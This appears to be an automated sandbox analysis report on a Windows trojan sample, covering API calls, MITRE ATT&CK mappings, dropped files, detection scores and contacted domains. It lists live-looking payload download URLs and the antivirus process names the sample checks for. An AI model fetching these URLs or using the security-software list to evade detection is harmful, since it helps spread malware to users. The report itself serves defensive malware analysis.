Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: ,Tab_HbitmapLayeredTab_UpdateStateTab_RefreshCallBackTab_NeedUpdateFocusManagementTabDownTab_OLDFocuscontrolTab_WM_DESTROYTab_WM_DESTROY_TRUETab_WM_32879EXUI_USERDATATab_WM_DESTROY_FALSETab_IsWinControlWM_SIZEIsunicodeTab_GraphicsTab_OldHbitmapICON_1DownlistExShell_TrayWnd
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,14_2_00426180
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetLocaleInfoA,14_2_0041759B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,14_2_100010CA
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,15_2_00426180
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetLocaleInfoA,15_2_0041759B
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: GetThreadLocale,GetLocaleInfoA,GetACP,15_2_100010CA
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeCode function: 7_3_6C674615 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,7_3_6C674615
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_00426020 GetVersionExW,14_2_00426020
Source: C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: kxetray.exe
Source: 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmpBinary or memory string: 360safe.exe
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10051470 htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10051470
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 14_2_10048BF0 socket,htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,getsockname,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,htons,listen,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,14_2_10048BF0
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10051470 htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,15_2_10051470
Source: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeCode function: 15_2_10048BF0 socket,htons,bind,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,getsockname,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,htons,listen,WSAGetLastError,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD@Z,_CxxThrowException,15_2_10048BF0

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Windows Management Instrumentation		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		1
Credential API Hooking		1
System Time Discovery		Remote Services1
Archive Collected Data		4
Ingress Tool Transfer		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
Native API		Boot or Logon Initialization Scripts1
Access Token Manipulation		21
Obfuscated Files or Information		LSASS Memory2
File and Directory Discovery		Remote Desktop Protocol1
Credential API Hooking		21
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts2
Command and Scripting Interpreter		Logon Script (Windows)12
Process Injection		11
Software Packing		Security Account Manager245
System Information Discovery		SMB/Windows Admin SharesData from Network Shared Drive1
Non-Standard Port		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Timestomp		NTDS541
Security Software Discovery		Distributed Component Object ModelInput Capture4
Non-Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
DLL Side-Loading		LSA Secrets13
Virtualization/Sandbox Evasion		SSHKeylogging15
Application Layer Protocol		Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
Masquerading		Cached Domain Credentials2
Process Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items13
Virtualization/Sandbox Evasion		DCSync1
Application Window Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation		Proc Filesystem1
Remote System Discovery		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550312 Sample: VZ7xFmeuPX.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 42 os.ljq520.top 2->42 44 sl.gzskins.com.w.kunlunca.com 2->44 46 20 other IPs or domains 2->46 64 Suricata IDS alerts for network traffic 2->64 66 Antivirus / Scanner detection for submitted sample 2->66 68 Multi AV Scanner detection for dropped file 2->68 70 5 other signatures 2->70 9 VZ7xFmeuPX.exe 3 2->9         started        signatures3 process4 file5 28 C:\Users\user\DesktopxuiKrnln_Win64.lib, PE32+ 9->28 dropped 30 C:\Users\user\DesktopxuiKrnln_Win32.lib, PE32 9->30 dropped 32 1B0E0E0D120C156B15...B0C0C160E0C160C.exe, PE32 9->32 dropped 74 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 9->74 76 Switches to a custom stack to bypass stack traces 9->76 13 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe 58 9->13         started        signatures6 process7 dnsIp8 60 os.ljq520.top 120.27.243.153, 32520, 49776, 57358 CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd China 13->60 62 sl.gzskins.com.w.kunlunca.com 180.163.146.103, 57237, 80 CHINANET-SH-APChinaTelecomGroupCN China 13->62 34 C:\Users\user\Desktop\vcruntime140.dll, PE32 13->34 dropped 36 C:\Users\user\...\msvcp140_codecvt_ids.dll, PE32 13->36 dropped 38 C:\Users\user\...\msvcp140_atomic_wait.dll, PE32 13->38 dropped 40 19 other files (18 malicious) 13->40 dropped 78 Antivirus detection for dropped file 13->78 80 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 13->80 82 Machine Learning detection for dropped file 13->82 84 4 other signatures 13->84 18 MiniThunderPlatform.exe 15 24 13->18         started        22 MiniThunderPlatform.exe 10 13->22         started        24 WMIC.exe 1 13->24         started        file9 signatures10 process11 dnsIp12 48 cnchubstat.sandai.net 140.206.225.136, 57267, 57291, 57304 CNCGROUP-SHChinaUnicomShanghainetworkCN China 18->48 50 192.168.2.1, 1900 unknown unknown 18->50 56 23 other IPs or domains 18->56 72 Multi AV Scanner detection for dropped file 18->72 52 download6.mcloud.139.com 36.138.50.131, 443, 57312, 57330 CMNET-AS-LIAONINGChinaMobilecommunicationscorporationC China 22->52 54 score.phub.hz.sandai.net 22->54 58 11 other IPs or domains 22->58 26 conhost.exe 24->26         started        signatures13 process14

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
VZ7xFmeuPX.exe79%ReversingLabsWin32.Trojan.Kelios
VZ7xFmeuPX.exe100%AviraTR/Kryptik.ianbq
VZ7xFmeuPX.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe100%AviraTR/Kryptik.ianbq
C:\Users\user\Desktop\AntiCheat.dll100%Joe Sandbox ML
C:\Users\user\Desktop\1B0E0E0D120C156B155E15B0C0C160E0C160C.exe100%Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe24%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\XLBugHandler.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\download_engine.dll5%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\minizip.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcp71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\msvcr71.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\download\zlib1.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\xldl.dll2%ReversingLabs
C:\Users\user\AppData\Local\Temp\zlibwapi.dll0%ReversingLabs
C:\Users\user\Desktop\AntiCheat.dll62%ReversingLabsWin32.PUA.Packunwan
C:\Users\user\Desktop\ExuiKrnln_Win32.lib3%ReversingLabs
C:\Users\user\Desktop\ExuiKrnln_Win64.lib0%ReversingLabs
C:\Users\user\Desktop\api-ms-win-crt-heap-l1-1-0.dll0%ReversingLabs
C:\Users\user\Desktop\api-ms-win-crt-math-l1-1-0.dll0%ReversingLabs
C:\Users\user\Desktop\api-ms-win-crt-runtime-l1-1-0.dll0%ReversingLabs
C:\Users\user\Desktop\api-ms-win-crt-stdio-l1-1-0.dll0%ReversingLabs
C:\Users\user\Desktop\api-ms-win-crt-string-l1-1-0.dll0%ReversingLabs
C:\Users\user\Desktop\concrt140.dll0%ReversingLabs
C:\Users\user\Desktop\msvcp140.dll0%ReversingLabs
C:\Users\user\Desktop\msvcp140_atomic_wait.dll0%ReversingLabs
C:\Users\user\Desktop\msvcp140_codecvt_ids.dll0%ReversingLabs
C:\Users\user\Desktop\vcruntime140.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://download6.mcloud.139.com3TQ0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLCoreAssets254_2.webm0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webms0%Avira URL Cloudsafe
http://116.132.219.22:80/0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmtiH0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm11J0%Avira URL Cloudsafe
http://sl.gzskins.com/SLVersionConfig.json0%Avira URL Cloudsafe
http://140.206.225.136:80/0%Avira URL Cloudsafe
http://www.winimage.com/zLibDll1.2.30%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto0%Avira URL Cloudsafe
https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3d0%Avira URL Cloudsafe
https://iexui.com/downexui0%Avira URL Cloudsafe
http://store.paycenter.uc.cnmail-attachment.googleusercontent.com0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhotocept:0%Avira URL Cloudsafe
http://116.132.218.191:80/0%Avira URL Cloudsafe
https://download6.mcloud.139.com0%Avira URL Cloudsafe
https://download6.mcloud.139.com/storageWeb/servlet0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm?0%Avira URL Cloudsafe
http://sl.gzskins.com/SLAppAssets101.to0%Avira URL Cloudsafe
https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=00%Avira URL Cloudsafe
https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQ0%Avira URL Cloudsafe
http://www.winimage.com/zLibDll-0%Avira URL Cloudsafe
http://store.paycenter.uc.cn0%Avira URL Cloudsafe
http://sl.gzskins.com/SLServerConfig.json0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_24100%Avira URL Cloudsafe
http://csc3-2010-aia.verisig0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmM0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exe0%Avira URL Cloudsafe
http://112.64.218.154:80/0%Avira URL Cloudsafe
http://logo.verisign.c0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm120%Avira URL Cloudsafe
http://ocsp.ver0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm0%Avira URL Cloudsafe
http://sl.gzskins.com/0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/0%Avira URL Cloudsafe
http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webma0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
download6.mcloud.139.com
36.138.50.131
truefalse
    		unknown
    skinx.x1.lolgezi.cc
    		107.148.237.1
    		truefalse
      		unknown
      sl.gzskins.com.w.kunlunca.com
      		180.163.146.103
      		truefalse
        		unknown
        cnchubstat.sandai.net
        		140.206.225.136
        		truetrue
          		unknown
          bgphub5u.sandai.net
          		47.102.130.81
          		truefalse
            		high
            bjbgp01.n.shifen.com
            		113.200.1.7
            		truefalse
              		high
              score.phub.hz.sandai.net
              		127.0.0.1
              		truefalse
                		unknown
                os.ljq520.top
                		120.27.243.153
                		truetrue
                  		unknown
                  cnc.hub5pnc.sandai.net
                  		47.92.202.235
                  		truefalse
                    		high
                    cnc.hub5pn.sandai.net
                    		111.206.4.176
                    		truefalse
                      		high
                      imhub5pr.hz.sandai.net
                      		127.0.0.1
                      		truefalse
                        		unknown
                        relay.phub.hz.sandai.net
                        		127.0.0.1
                        		truefalse
                          		unknown
                          pr.x.hub.sandai.net
                          		116.132.219.22
                          		truefalse
                            		high
                            cncidx.m.hub.sandai.net
                            		112.64.218.154
                            		truefalse
                              		high
                              sl.gzskins.com
                              		unknown
                              		unknownfalse
                                		unknown
                                hub5c.hz.sandai.net
                                		unknown
                                		unknownfalse
                                  		unknown
                                  hub5idx.shub.hz.sandai.net
                                  		unknown
                                  		unknownfalse
                                    		unknown
                                    hub5u.hz.sandai.net
                                    		unknown
                                    		unknownfalse
                                      		high
                                      bjbgp01.baidupcs.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        hubstat.hz.sandai.net
                                        		unknown
                                        		unknownfalse
                                          		unknown
                                          pmap.hz.sandai.net
                                          		unknown
                                          		unknownfalse
                                            		high
                                            hub5pr.hz.sandai.net
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              hub5pn.hz.sandai.net
                                              		unknown
                                              		unknownfalse
                                                		high
                                                hub5pnc.hz.sandai.net
                                                		unknown
                                                		unknownfalse
                                                  		high

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLCoreAssets254_2.webmfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://140.206.225.136:80/true
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://116.132.219.22:80/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://sl.gzskins.com/SLVersionConfig.jsonfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://116.132.218.191:80/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://sl.gzskins.com/SLAppAssets101.tofalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dJdEF5Q0tv&un=D520D8ADC384964E306AF1AA3DEEAF44A0596F6CB5C8600FE560D3DA9892C32B&dom=D930&rate=0&txType=0false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://sl.gzskins.com/SLServerConfig.jsonfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBox/%E8%B5%84%E6%BA%90%E4%BF%AE%E5%A4%8D%E5%8C%85_241019_1.exefalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://112.64.218.154:80/false
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://sl.gzskins.com/false
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.winimage.com/zLibDll1.2.31B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.xunlei.com/MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                    		high
                                                    http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmtiHMiniThunderPlatform.exe, 0000000E.00000002.1614649879.00000000007F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://skinx.x1.lolgezi.cc/d/PanAlist139Yun/SLBoxMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webmsMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://schemas.xmlsoap.org/soap/encoding/MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                      		high
                                                      http://www.xunlei.com/GETMiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                        		high
                                                        https://download6.mcloud.139.com3TQMiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://ocsp.thawte.com01B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drfalse
                                                          		high
                                                          http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm11JMiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://download6.mcloud.139.com/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQxN3dMiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://schemas.xmlsoap.org/soap/envelope/MiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                            		high
                                                            http://skinx.x1.lolgezi.cc/d/PanAlistPhotoMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://store.paycenter.uc.cnmail-attachment.googleusercontent.comMiniThunderPlatform.exe, 0000000E.00000002.1614044465.0000000000448000.00000040.00000001.01000000.0000000F.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://skinx.x1.lolgezi.cc/d/PanAlistPhotocept:MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            https://bjbgp01.baidupcs.com/file/0a382c0d6mc9d86e83dea8b6b711ec95?bkt=en-2e2b5030dd6ff03724ec263689MiniThunderPlatform.exe, 0000000E.00000002.1618143876.000000000C90C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000002.1617920624.000000000C904000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://skinx.x1.lolgezi.cc/d/PanAlistPhoto/SLBox241019_2.webm?MiniThunderPlatform.exe, 0000000E.00000002.1617881554.000000000C8F6000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000E.00000003.1612566345.000000000C8F5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              		unknown
                                                              http://www.openssl.org/support/faq.htmlMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                                		high
                                                                https://iexui.com/downexui1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1416143729.00000000083CE000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415949041.00000000081F1000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415571391.00000000081FC000.00000004.00000020.00020000.00000000.sdmp, 1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1415739688.0000000008368000.00000004.00000020.00020000.00000000.sdmp, ExuiKrnln_Win32.lib.5.dr, ExuiKrnln_Win64.lib.5.drfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://download6.mcloud.139.comMiniThunderPlatform.exe, 0000000F.00000003.1675363991.000000000C6E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                https://download6.mcloud.139.com/storageWeb/servletMiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://nginx.org/r/error_logMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722683050.000000000C67C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722646058.000000000C674000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://www.winimage.com/zLibDll-1B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, minizip.dll.7.drfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  https://download6.mcloud.139.com:443/storageWeb/servlet/downloadServlet?code=TTIxRDExcUFxWUsyZUE2ODQMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000003.1722484573.000000000C66C000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722583922.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1723141682.000000000C670000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722815289.000000000C66A000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000003.1722839677.000000000C66F000.00000004.00000020.00020000.00000000.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1724450109.000000000C670000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://crl.thawte.com/ThawteTimestampingCA.crl01B0E0E0D120C156B155E15B0C0C160E0C160C.exe, 00000007.00000003.1435145583.0000000000528000.00000002.10000000.00040000.00000000.sdmp, download_engine.dll.7.dr, XLBugHandler.dll.7.dr, MiniThunderPlatform.exe.7.drfalse
                                                                    		high
                                                                    http://www.openssl.org/support/faq.html....................MiniThunderPlatform.exe, 0000000E.00000002.1619279871.0000000010001000.00000040.00000001.01000000.00000014.sdmp, MiniThunderPlatform.exe, 0000000F.00000002.1725202157.0000000010001000.00000040.00000001.01000000.00000014.sdmpfalse
                                                                      		high
                                                                      http://csc3-2010-aia.verisigMiniThunderPlatform.exe, 0000000E.00000003.1545516600.00000000007F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
                                                                      http://store.paycenter.uc.cnMiniThunderPlatform.exe, MiniThunderPlatform.exe, 0000000F.00000002.1723428878.0000000000448000.00000040.00000001.01000000.0000000F.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown
